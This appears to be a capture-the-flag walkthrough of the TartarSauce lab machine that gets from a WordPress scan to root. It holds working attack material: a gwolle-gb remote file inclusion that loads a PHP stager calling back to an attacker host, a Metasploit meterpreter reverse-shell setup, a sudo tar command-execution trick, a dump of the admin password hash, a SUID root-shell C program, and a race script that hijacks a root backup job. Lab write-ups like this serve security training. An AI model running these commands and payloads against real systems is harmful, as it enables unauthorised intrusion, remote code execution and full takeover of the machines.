[+] Name: akismet - v4.0.3
 |  Last updated: 2018-06-19T18:18:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/akismet/readme.txt
[!] The version is out of date, the latest version is 4.0.8

[+] Name: gwolle-gb - v2.3.10
 |  Last updated: 2018-09-07T19:44:00.000Z
 |  Location: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/
 |  Readme: http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/readme.txt
[!] The version is out of date, the latest version is 2.6.3
The last one (gwolle-gb) is marked as vulnerable to XSS, but on Exploit-DB we found that the plugin is also vulnerable to RFI.
The HTTP GET parameter abspath is not properly sanitized before being used in a PHP require() call. A remote attacker can include a file named wp-load.php from an arbitrary remote server and execute its content on the vulnerable web server. To do so, the attacker needs to place a malicious wp-load.php file in their server's document root and pass the server's URL in the request, as shown below.
N.B.: in order to work, this exploit needs allow_url_include to be enabled. Otherwise an attacker may still include local files and potentially execute arbitrary code.
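A quick way to confirm the inclusion before building the real payload (a sketch, assuming outbound HTTP from the target is allowed) is to point abspath at our own web server and watch the access log, since the plugin will try to fetch wp-load.php from whatever base URL we supply:

# on the attacker machine: serve an empty directory and watch the log
sudo python3 -m http.server 80 &

# trigger the inclusion; the trailing slash matters because the plugin
# appends "wp-load.php" to the abspath value
curl "http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.95/"

# a "GET /wp-load.php" line in the http.server output confirms the RFI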
First we set up a Metasploit web_delivery handler; its PHP stager will become the content of the wp-load.php file:
msfconsole -x "use exploit/multi/script/web_delivery; set URIPATH dodometer; set LPORT 3487; set LHOST $(ip addr show tun0 | grep -Po "inet \K[\d.]+"); set SRVHOST $(ip addr show tun0 | grep -Po "inet \K[\d.]+"); set target PHP; set payload php/meterpreter/reverse_tcp; run -j"
Now we create the file to be served (wp-load.php) and host it with the classic python -m http.server 80:
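The content of wp-load.php is simply the PHP stager that web_delivery hands out; a minimal sketch is below (the exact eval line is whatever the module prints when the job starts, and the 8080 port is web_delivery's default SRVPORT, which we did not override):

# write the stager into the file the target will fetch and include
cat > wp-load.php <<'EOF'
<?php
eval(file_get_contents('http://10.10.16.95:8080/dodometer'));
EOF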
Issuing the request http http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10.16.95/ we got a meterpreter session.
python -c 'import pty; pty.spawn("/bin/bash")'
From /etc/passwd we saw that the main user is onuma, so we need to find a way to privesc from www-data:
Listing user sudo privileges we got an interesting result:
www-data@TartarSauce:/tmp$ sudo -l
Matching Defaults entries for www-data on TartarSauce:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on TartarSauce:
    (onuma) NOPASSWD: /bin/tar
User www-data can run tar with sudo as onuma without a password, and the tar command can be abused to execute arbitrary commands: https://gtfobins.github.io/#tar. So we can easily get an onuma shell with:
sudo -u onuma tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
For a more stable and powerful shell we upgrade this /bin/bash to a meterpreter session for user onuma and read the first flag:
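One way to do this (a sketch; any payload delivery works, and php-cli being available on the box is an assumption) is to reuse the web_delivery job that is still running and launch its PHP one-liner from the onuma shell, so the new session checks in as onuma:

# run from the shell obtained via sudo tar, i.e. as onuma; the URL mirrors
# the web_delivery job started earlier (SRVPORT left at its 8080 default)
php -d allow_url_fopen=true -r "eval(file_get_contents('http://10.10.16.95:8080/dodometer'));"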
From mysql we got the wpadmin hash:
mysql> select user_login, user_pass from wp_users;
+------------+------------------------------------+
| user_login | user_pass                          |
+------------+------------------------------------+
| wpadmin    | $P$BBU0yjydBz9THONExe2kPEsvtjStGe1 |
+------------+------------------------------------+
1 row in set (0.00 sec)
And using LinEnum we saw an unusual systemd timer and service:
#-------------------------------------------------------------------------------------
# backuperer ver 1.0.2 - by ȜӎŗgͷͼȜ
# ONUMA Dev auto backup program
# This tool will keep our webapp backed up incase another skiddie defaces us again.
# We will be able to quickly restore from a backup in seconds ;P
#-------------------------------------------------------------------------------------

# Set Vars Here
basedir=/var/www/html
bkpdir=/var/backups
tmpdir=/var/tmp
testmsg=$bkpdir/onuma_backup_test.txt
errormsg=$bkpdir/onuma_backup_error.txt
tmpfile=$tmpdir/.$(/usr/bin/head -c100 /dev/urandom |sha1sum|cut -d' ' -f1)
check=$tmpdir/check

# formatting
printbdr()
{
    for n in $(seq 72);
    do /usr/bin/printf $"-";
    done
}
bdr=$(printbdr)

# Added a test file to let us see when the last backup was run
/usr/bin/printf $"$bdr\nAuto backup backuperer backup last ran at : $(/bin/date)\n$bdr\n" > $testmsg

# Cleanup from last time.
/bin/rm -rf $tmpdir/.* $check

# Backup onuma website dev files.
/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

# Added delay to wait for backup to complete if large files get added.
/bin/sleep 30

# Test the backup integrity
integrity_chk()
{
    /usr/bin/diff -r $basedir $check$basedir
}

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check

if [[ $(integrity_chk) ]]
then
    # Report errors so the dev can investigate the issue.
    /usr/bin/printf $"$bdr\nIntegrity Check Error in backup last ran : $(/bin/date)\n$bdr\n$tmpfile\n" >> $errormsg
    integrity_chk >> $errormsg
    exit 2
else
    # Clean up and save archive to the bkpdir.
    /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak
    /bin/rm -rf $check .*
    exit 0
fi
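To see how the job is scheduled, the timer and service units can also be inspected directly (a manual check, assuming the unit names match the script name; LinEnum surfaces the same information):

# list active timers and dump the unit files for the backup job
systemctl list-timers --all | grep -i backuperer
systemctl cat backuperer.timer backuperer.service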
This script periodically backs up /var/www/html and checks whether anything in it has changed. The first thing that caught our attention is the extraction step: tar is run by root, so it restores the ownership and permission bits stored in the archive, and the extracted files come out exactly as we packed them, SUID bit included.
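A quick local illustration of that behaviour (not from the box, just something you can reproduce anywhere to convince yourself):

# build a tiny archive containing a root-owned SUID file...
mkdir -p demo/var/www/html
cp /bin/true demo/var/www/html/shell
sudo chown root:root demo/var/www/html/shell
sudo chmod 4755 demo/var/www/html/shell
tar -C demo -zcf demo.tar.gz var/www/html

# ...and extract it as root: ownership and the SUID bit come back as stored
mkdir extracted
sudo tar -zxvf demo.tar.gz -C extracted
ls -l extracted/var/www/html/shell   # -rwsr-xr-x 1 root root ...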
We can create an archive containing a SUID binary to spawn a root shell. The plan:
1. wait for the script to generate the hidden $tmpfile;
2. substitute the $tmpfile archive with the one containing the SUID shell;
3. avoid the deletion of all files in the $check path;
4. run the shell.
We can hijack the script into extracting our archive in /var/tmp/check/: the crafted archive must be created with the same base path as the original (var/www/html), so that the extracted files land under $check$basedir and integrity_chk reports a difference.
For the first step we can write a script that loops until the hidden file is created and then copies the crafted archive over it, keeping the same path and name.
For the SUID binary we wrote a C program to spawn a /bin/bash shell:
#include <stdio.h>
#include <unistd.h>
#include <grp.h>

int main(int argc, char *argv[])
{
    gid_t newGrp = 0;

    if (setuid(0) != 0) {
        perror("Setuid failed, no suid-bit set?");
        return 1;
    }
    setgid(0);
    seteuid(0);
    setegid(0);
    setgroups(1, &newGrp);

    execvp("/bin/bash", argv);

    return 0;
}
We compiled the code with gcc -m32 shell.c -o var/www/html/shell.
We must use the var/www/html/ path because the script diffs /var/www/html against /var/tmp/check/var/www/html/, and we need that check to fail: when integrity_chk reports differences the script takes the error branch and exits before reaching /bin/mv $tmpfile $bkpdir/onuma-www-dev.bak and /bin/rm -rf $check .*, so the extracted files are left in place. Once past this step we have the SUID binary in /var/tmp/check/var/www/html.
To create the archive we first must set root ownership and the SUID bit on the compiled shell.
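These are the obvious commands on the attack machine (a sketch; any mode that keeps the setuid bit and execute permission would do):

# run from the directory that contains var/www/html/shell
sudo chown root:root var/www/html/shell
sudo chmod 4755 var/www/html/shell   # rwsr-xr-x: setuid root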
With tar we create the archive: tar -czvf dodo.tar.gz var/www/html/*.
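To stage everything on the box we used a hidden directory; the transfer below is only one option (wget from the same python web server; meterpreter's upload would work just as well), and monitor.sh is our hypothetical name for the watcher script shown next:

# on the target, as onuma
mkdir -p /tmp/.dodo && cd /tmp/.dodo
wget http://10.10.16.95/dodo.tar.gz
wget http://10.10.16.95/monitor.sh     # the watcher script shown below
chmod +x monitor.sh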
Once uploaded (in /tmp/.dodo) we started the script to monitor the creation of the hidden file in /var/tmp/:
#!/usr/bin/env bash
# run from /var/tmp: wait for backuperer's hidden archive to appear,
# then swap in our crafted one during the 30-second sleep window
while [[ -z "$(\ls -a .????????????????????* 2>/dev/null)" ]]; do : ; done

filename=$(\ls -a .????????????????????*)
cp /tmp/.dodo/dodo.tar.gz "${filename}"
Once the hidden file is created, the script reads its name and overwrites it with our archive from /tmp/.dodo. After a while (~5 minutes) the systemd timer fired and we got the extracted files in the check/ folder.
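Before launching it, a quick sanity check that the bits survived extraction (the expected output is an assumption based on the archive we built):

ls -l /var/tmp/check/var/www/html/shell
# -rwsr-xr-x 1 root root ... shell   <- still root-owned with the SUID bit set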
Running /var/tmp/check/var/www/html/shell we got a root bash!